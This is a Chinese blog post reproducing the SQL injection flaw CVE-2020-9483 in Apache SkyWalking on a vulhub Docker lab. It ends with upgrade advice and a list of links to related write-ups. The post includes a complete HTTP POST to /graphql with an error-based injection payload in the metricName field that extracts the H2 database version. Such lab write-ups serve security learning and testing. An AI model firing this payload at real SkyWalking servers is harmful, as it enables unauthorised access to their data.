漏洞信息

漏洞名称
ApacheSkyWalking SQL注入漏洞
漏洞编号
CVE-2020-9483
危害等级
高危
漏洞类型
通用型漏洞
漏洞厂商
Apache
漏洞概述
当使用H2 / MySQL / TiDB作为Apache SkyWalking存储时,通过GraphQL协议查询元数据时,存在SQL注入漏洞,该漏洞允许访问未指定的数据。 Apache SkyWalking 6.0.0到6.6.0、7.0.0 H2 / MySQL / TiDB存储实现不使用适当的方法来设置SQL参数。

环境搭建

先在kali安装docker-compose
然后下载靶场vulhub:
docker-compose up -d
生成靶场环境:
访问8080端口:

环境搭建完成。

漏洞复现

利用burpsuite抓包:
BP抓包,利用报错注入获取版本

POST /graphql HTTP/1.1
Host: 192.168.18.149:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
Content-Length: 610
Origin: http://192.168.18.149:8080
Connection: close
Referer: http://192.168.18.149:8080/
{"query":"query queryLogs($condition: LogQueryCondition) {queryLogs(condition: $condition) {totallogs {serviceIdserviceNameisErrorcontent}}
}
","variables":{"condition":{"metricName":"INFORMATION_SCHEMA.USERS union all select h2version())a where 1=? or 1=? or 1=? --","endpointId":"1","traceId":"1","state":"ALL","stateCode":"1","paging":{"pageSize":10}}}
}

成功返回h2数据库版本信息!

修复建议

1、升级Apache Skywalking 到最新的 v8.4.0 版本。
2、将默认h2数据库替换为其它支持的数据库。

(CVE-2020-9483)ApacheSkyWalking SQL注入 漏洞复现相关推荐

  1. kkcms前台sql注入漏洞复现

    kkcms前台sql注入漏洞复现 目录 安装kkcms 漏洞复现 安装kkcms 下载kkcms地址: https://github.com/https://github.com/ 浏览器访问主机ip ...

  2. espcms5.7.13 sql注入漏洞复现

    espcms5.7.13 sql注入漏洞复现 作者: admin 时间: 2021-06-28 分类: 漏洞复现 使用代码审计工具自动审计,找到select语句,双击进入/adminsoft/cont ...

  3. 通达OA 11.5 SQL注入漏洞复现

    0x00 漏洞描述 通达OA 11.5存在sql注入 0x01 漏洞影响版本 通达oa 11.5 0x02 漏洞复现 1.下载通达OA 11.5 https://cdndown.tongda2000. ...

  4. 泛微OA e-cology WorkflowCenterTreeData前台接口SQL注入漏洞复现

    漏洞描述 泛微e-cology OA系统的WorkflowCenterTreeData接口在使用oracle数据库时,由于内置sql语句拼接不严,导致其存在sql注入漏洞 影响范围 使用oracle数 ...

  5. 宏景eHR SQL注入漏洞复现(CNVD-2023-08743)

    0x01 产品简介 宏景eHR人力资源管理软件是一款人力资源管理与数字化应用相融合,满足动态化.协同化.流程化.战略化需求的软件. 0x02 漏洞概述 宏景eHR 存在SQL注入漏洞,未经过身份认证的 ...

  6. 畅捷通T+ SQL注入漏洞复现(QVD-2023-13612)

    0x01 产品简介 畅捷通 T+ 是一款基于互联网的新型企业管理软件,功能模块包括:财务管理.采购管理.库存管理等.主要针对中小型工贸和商贸企业的财务业务一体化应用,融入了社交化.移动化.物联网.电子 ...

  7. 【漏洞复现】泛微OA E-Cology V9 browser.jsp SQL注入漏洞复现及利用(CNVD-2023-12632)

    文章目录 前言 声明 一.产品介绍 二.漏洞描述 三.影响范围 四.漏洞分析 五.漏洞复现 六.SQLMAP漏洞利用 七.修复方案 前言 泛微E-Cology v9 Browser.jsp 存在SQL ...

  8. 泛微e-cology9 SQL注入漏洞复现(QVD-2023-5012)

    1.产品简介 泛微协同管理应用平台e-cology是一套兼具企业信息门户.知识文档管理.工作流程管理.人力资源管理.客户关系管理.项目管理.财务管理.资产管理.供应链管理.数据中心功能的企业大型协同管 ...

  9. 泛微E-Cology SQL注入漏洞复现(QVD-2023-15672)

    0x01 产品简介 泛微协同管理应用平台e-cology是一套兼具企业信息门户.知识文档管理.工作流程管理.人力资源管理.客户关系管理.项目管理.财务管理.资产管理.供应链管理.数据中心功能的企业大型 ...

最新文章

  1. 滴滴叶杰平:年运送乘客百亿次,AI如何“服务”出行领域?| BDTC 2019
  2. Matlab问题汇总!
  3. Cydia for Android2
  4. 5u fb库 三菱plc_三菱FX5U PLC入门必备基础知识特点
  5. 2020 我的C++的学习之路 第十章 对象和类
  6. 教育|施一公:研究生最重要的素质是什么?
  7. 八皇后问题--C语言学习笔记
  8. When we first heard of Linux
  9. php数字转千分制,JS实现金额千分制的转换以及还原
  10. 小程序短视频项目———视频详情页面开发(二)
  11. 系统设计---分层,分级,分块
  12. 冲着名为Sundy的男人去麦子学院
  13. html开始游戏如何打开,dnf游戏进不去 点击开始-运行,输入CMD
  14. JavaScript页面跳转并传参的常用方法
  15. java基础_设计模式_设计基础(小鸭子游戏)
  16. 【音视频开发】基础知识:视频简介
  17. 从表征到行动---意向性的自然主义进路(续六)
  18. 用Excel为人生铺路,走向希望的彼岸
  19. nCode:DesignLife案例教程十一
  20. 刚刚出新的Kubernetes 却曝出了“高危”安全漏洞;亚马逊将推免费新闻视频服务,对标苹果 | 极客头条...

热门文章

  1. 由玫琳凯赞助的NFTE世界创新系列赛挑战赛公布致力于解决全球问题的青年获胜者
  2. 三星Gear VR与Oculus Rift DK2全方位比拼
  3. web开发(九) 使用javamail进行发送邮件,(使用QQ,163,新浪邮箱服务器)
  4. mac上的一款超级强大的文件管理工具Forklift
  5. 通过xsd校验xml
  6. C++ QT结合FFmpeg实战开发视频播放器-09项目资源和UI加载的流程
  7. 十五分钟实现Google Talk客户端(附例子)
  8. java带参数的构造方法_简单了解JAVA构造方法
  9. java assembly_java – maven-assembly-plugin:如何使用appendAssemblyId
  10. android lib 界面库,全开源C++ DirectUI 界面库SOUI 3.0更新